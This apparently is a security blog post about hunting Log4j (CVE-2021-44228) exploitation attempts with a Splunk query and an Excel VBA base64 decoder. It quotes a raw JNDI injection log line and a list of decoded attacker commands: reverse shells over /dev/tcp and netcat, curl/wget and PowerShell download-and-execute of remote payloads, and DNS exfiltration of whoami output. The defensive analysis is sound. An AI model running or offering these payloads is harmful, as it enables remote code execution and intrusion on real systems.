As you are aware, a new Log4j vulnerability (CVE-2021-44228) has been disclosed and is currently being exploited in the wild.

So, I’m using the Splunk query below, based on the Splunk blog [1], to see whether there are attempts to use this vuln/exploit against our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype 

As you can see, there are a number of attempts observed against our infra for the past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=} https://X.X.X.X/owa/ 200 0 0 0

Using the Splunk query above, the results come back as a table, with the extracted base64 in a field named “string“.

The result, after we export it from Splunk and open it in Excel, looks like:

If you decode the base64 from the raw event example above:

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=

It appears to be a curl & wget attempt towards our infra:

(curl -s 45.155.205.233:5874/X.X.X.X:443||wget -q -O- 45.155.205.233:5874/X.X.X.X:443)|bash

I’m wondering... how can I quickly decode all these base64 strings? We’re not going to decode them one by one, are we? There are hundreds, or probably thousands, of them.

So… we’re going to leverage Excel & a macro (yes, you read it right: MACRO) to automatically decode those base64 strings for us. We’re going to Excel-Fu our way out of this data.

The macro code that we’ll be using is below:

' Encodes text to base64: ADODB.Stream converts the string to bytes in the
' requested charset, then MSXML's bin.base64 node type does the encoding.
Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Open
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
        .Close
    End With

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        ' MSXML wraps long output with CR/LF; strip them so the cell holds one line
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

' Decodes base64 to text: MSXML turns the base64 into a byte array, then
' ADODB.Stream reads those bytes back as text in the requested charset
' (e.g. "ASCII"). Usable directly from a cell: =TextBase64Decode(cell, charset)
Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Open
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
        .Close
    End With

End Function

To use it, first, we need to open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the macro editor. Create a new macro; you can give it any name you want. For example, I named it “Base64“:

It will then open a new window. Paste the macro code given above inside the editor:

After that, close the editor window. Just leave Excel open.

Then, create 2 new columns in the Excel sheet, named “ASCII” and “Decoded Base64“:

We need to fill the “ASCII” column with the string “ASCII” all the way to the end/bottom of your data. Let’s say you have 300 rows of data in your Excel sheet; then fill 300 “ASCII” strings beside them.

Just press Ctrl + Arrow-Down to quickly go to the end/bottom of the data column. After that, type the string “ASCII” in one of the rows and copy it (Ctrl-C). Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. Then paste (Ctrl + V) to fill the whole column with the string “ASCII“.

Your Excel will look something like this:

Next, we’re going to start decoding the base64 strings.

Again, press Ctrl + Arrow-Down to go to the end of the column, and type the formula below:

=TextBase64Decode(<column-string>,<column-ASCII>)

Refer to the example below:

Then, again, copy the cell with the formula, press Ctrl + Shift + Arrow-Up to select from bottom to top, and paste (Ctrl + V) the formula into the whole selection under “Decoded Base64“.

That’s it. We have successfully decoded all the base64 strings via Excel.

List of attempts that I’ve observed so far:

(curl http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php || wget -q -O- http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php)|bash
(curl -S https://www.econ-jobs.com/Scripts/op.php||wget https://www.econ-jobs.com/Scripts/op.php)|bash
/bin/bash -i >& /dev/tcp/141.105.65.94/81
bash -i  >& /dev/tcp/139.59.138.109/8080 0>&1
bash -i >& /dev/tcp/141.105.65.94/443 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php
dig $(whoami).c6sp7vq2vtc0000xa9y0gdc5d7hyyyyyb.interactsh.com
dig $(whoami).wjj96oqhn65ebgyqdrh6lt7o6fc80x.burpcollaborator.net
nc 165.22.213.147 8888 -e /bin/bash ; curl http://165.22.213.147:7777/backdoor.sh -o backdoor.sh ; chmod +x ./backdoor.sh ;bash backdoor.sh ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin.net/raw/0l8h4xuvxe'))
telnet 141.105.65.94 443
touch /tmp/pwned
wget http://155.94.154.170/aaa;curl -O http://155.94.154.170/aaa;chmod 777 aaa;./aaa
wget http://194.36.188.187:9090/log/14953

References:
[1] https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
[2] https://stackoverflow.com/questions/41572920/encoding-special-chracters-to-base64-in-excel-vba

By zam

One thought on “Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel”
